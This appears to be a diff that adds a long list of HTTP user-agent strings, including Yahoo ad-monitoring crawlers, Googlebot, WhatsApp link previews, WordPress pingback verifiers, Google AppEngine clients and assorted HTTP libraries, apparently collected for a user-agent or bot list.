    +Mozilla/5.0 (compatible; 2GDPR/1.2; https://2gdpr.com)
    +SimplePie/1.4-dev (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20200910120631
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599698014-10
    +WhatsApp/2.20.200.3 A
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) adbeat.com/policy Gecko/20100101 Firefox/80.0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.110 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599697018-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599698771-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599741459-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599766157-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599770241-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599769958-0
    +WordPress/3.7.5; http://reaulofilhass.unblog.fr
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) https://deepcrawl.com/bot
    +GuzzleHttp/6.4.1 curl/7.61.1 PHP/7.4.8
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.105 Mobile Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599748567-0
    +W3C-checklink/5.0.0
    +WordPress/3.7.5; http://monsurosis.unblog.fr
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599748567-60
    +yacybot (/global; amd64 Linux 5.4.0-40-generic; java 11.0.8; Etc/en) http://yacy.net/bot.html
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599748566-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.0.1; DLI-TL20 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599748568-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~houseinfotimur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bugsinfovtlro)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~baseinfopetro)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~storeinfotimur)
    +WordPress/5.5.1; https://help.britecore.com
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1599800539-20
    +Python/3.8 aiohttp/3.5.4
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599784385-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599804062-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599826829-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599851141-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.111 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599784518-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599784463-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599790173-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599794270-0
    +WhatsApp/2.20.200.5 A
    +WordPress/5.5.1; http://softwarevan.com
    +okhttp/4.8.1
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599828606-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599830371-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599831433-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599839256-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599839258-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599850440-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599852915-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599855468-0
    +WhatsApp/2.20.200.6 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599868666-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599808316-0
    +Mozilla/5.0 (en-us) AppleWebKit/537.36 (KHTML, like Gecko; Google PP Default) Chrome/85.0.4183.105 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599860146-0
    +WordPress/3.7.5; http://cioderpacon.unblog.fr
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599808316-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599860146-60
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~nazanbfioox)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599808315-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 9; IdeaTabA1000-G ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599860145-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599808316-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~nazatferonsio)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~stockinfokris)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~lakeinfokris)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599860147-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bizinfovtlro)
    +FacebookExternalHit/1.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599804848-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    +unirest-java/3.0.00
    +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) adbeat.com/policy Gecko/20100101 Firefox/80.0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
    +Java/11.0.7-ea
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599870385-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.112 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599871091-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599883413-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599894147-0
    +WhatsApp/2.2037.5 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599937783-0
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1599941038-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599944848-0
    +GetRight/6.5 [Segment 1]
    +GetRight/6.5 [Segment 3]
    +GetRight/6.5 [Segment 2]
    +GetRight/6.5 [Segment 0]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/85.0.4183.105 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Java/1.8.0_261
    +Java/14.0.1
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~siteinfonikho)
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63
    +WordPress/5.1.6; http://godknowstravel.com; verifying pingback from 80.255.5.198
    +WordPress/4.9.15; http://cfs.ophen.org; verifying pingback from 178.33.36.92
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1.1; SM-J701F ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.0.2; GT-S5360 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1599959183-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599966486-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599988398-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1599999641-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600035939-0
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 TinEye/1.0 (via http://www.tineye.com/)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~shopinfovict)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bugsinfokokor)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~stockinfopetro)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~lakeinfovict)
    +PostmanRuntime/7.26.5
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 DuckDuckGo/7
    +Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko BingPreview/1.0b
    +FeedlyApp/1.0 (http://www.feedly.com)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600067098-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600079212-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600067099-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600079213-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600079224-10
    +WordPress/4.7.18; https://www.chaletalpaca.com; verifying pingback from 80.255.5.198
    +Google Chrome 84.0.4147.135 (WebKit 537.36)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600087918-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.106
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600044053-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600052704-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600056701-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600060021-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600081160-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600088127-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600107396-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600118682-0
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~bugsinfokrisf)
    +WordPress/3.7.5; http://gravibpari.unblog.fr
    +WordPress/3.7.5; http://entiolenni.unblog.fr
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~houseinfonatav)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~siteinfovtlr)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600063662-0
    +python-httpx/0.14.3
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 5.1; SM-G600FY ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600128733-10
    +WhatsApp/2.20.200.8 A
    +Apache-HttpClient/4.5.12 (Java/1.8.0_261)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600185026-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600189614-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.noproxy/1600189657-10
    +WhatsApp/2.20.199.14 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.noproxy/1600203391-10
    +Apache-HttpClient/4.5.12 (Java/1.8.0_265)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600129791-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600136577-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600139187-0
    +GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.4.7
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600157798-0
    +Mozilla/5.0 (X11; Linux x86_64; rv:79.0) adbeat.com/policy Gecko/20100101 Firefox/79.0
    +FDM/6.11.0.3218
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600172237-0
    +WhatsApp/2.20.200.7 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600190513-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600190515-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.noproxy/1600192578-0
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) adbeat.com/policy Gecko/20100101 Firefox/79.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.noproxy/1600205298-0
    +WordPress/5.3.4; https://rdtk.net
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600173203-0
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.0 Safari/537.36 (compatible; Yeti/1.1; +http://naver.me/spd)
    +Snapchat/11.1.0.65 (iPhone12,1; iOS 13.6.1; gzip)
    +WordPress/5.5.1; http://haar.animojimemoji.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600173203-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600173202-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600173204-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~baseinfokris)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~bizinfoshur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~nazarnopofshi)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.5.983 (SpeedMode; Proxy; Android 4.4.4; GT-I9060I ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Proxy; Android 6.0.1; Redmi_4X ) U2/1.0.0 Mobile
    +p2/1.2.100.v20180822-1354 (Java 12.0.1+12 Oracle Corporation; Windows10 10.0.0 x86-64; en_IN) org.eclipse.epp.package.reporting.product/4.12.0.I20190605-1800 (org.eclipse.ui.ide.workbench)
    +mpc/1.8.0 (Java 14.0.1+7 Oracle Corporation; Windows10 10.0.0 x86-64; en_IN) org.eclipse.epp.package.java.product/4.13.0.I20190916-1045 (org.eclipse.ui.ide.workbench)
    +p2/1.2.200.v20190716-0800 (Java 12.0.2+10 Oracle Corporation; Windows10 10.0.0 x86-64; en_IN) org.eclipse.epp.package.java.product/4.13.0.I20190916-1045 (org.eclipse.ui.ide.workbench)
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Edg/84.0.522.61
    +WordPress/5.2.7; https://ets.lt; verifying pingback from 153.3.114.143
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600215315-10
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/85.0.4183.113 Safari/537.36
    +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) adbeat.com/policy Gecko/20100101 Firefox/79.0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 7.1.1; SM-J727T1 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600262870-10
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600216149-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600236640-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600236841-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600239576-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600259787-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600264718-0
    +WhatsApp/2.20.200.9 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600284551-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600285395-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600299067-0
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/85.0.4183.105 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WhatsApp/2.20.199.15 A
